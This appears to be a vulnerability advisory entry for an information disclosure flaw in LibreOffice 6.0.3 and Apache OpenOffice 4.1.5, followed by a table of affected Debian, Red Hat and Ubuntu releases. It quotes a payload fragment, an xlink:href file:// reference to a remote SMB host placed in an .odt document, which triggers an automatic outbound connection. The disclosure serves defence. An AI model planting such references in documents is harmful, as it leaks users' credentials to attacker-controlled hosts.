An information disclosure vulnerability occurs when LibreOffice 6.0.3 and Apache OpenOffice Writer 4.1.5 automatically process and initiate an SMB connection embedded in a malicious file, as demonstrated by xlink:href=file://192.168.0.2/test.jpg within an office:document-content element in a .odt XML document.
Vulnerable Product | Search on Vulmon | Subscribe to Product |
---|---|---|
libreoffice libreoffice 6.0.3 |
||
apache openoffice 4.1.5 |
||
debian debian linux 8.0 |
||
debian debian linux 7.0 |
||
debian debian linux 9.0 |
||
redhat enterprise linux desktop 7.0 |
||
redhat enterprise linux workstation 7.0 |
||
redhat enterprise linux server 7.0 |
||
canonical ubuntu linux 16.04 |
||
canonical ubuntu linux 14.04 |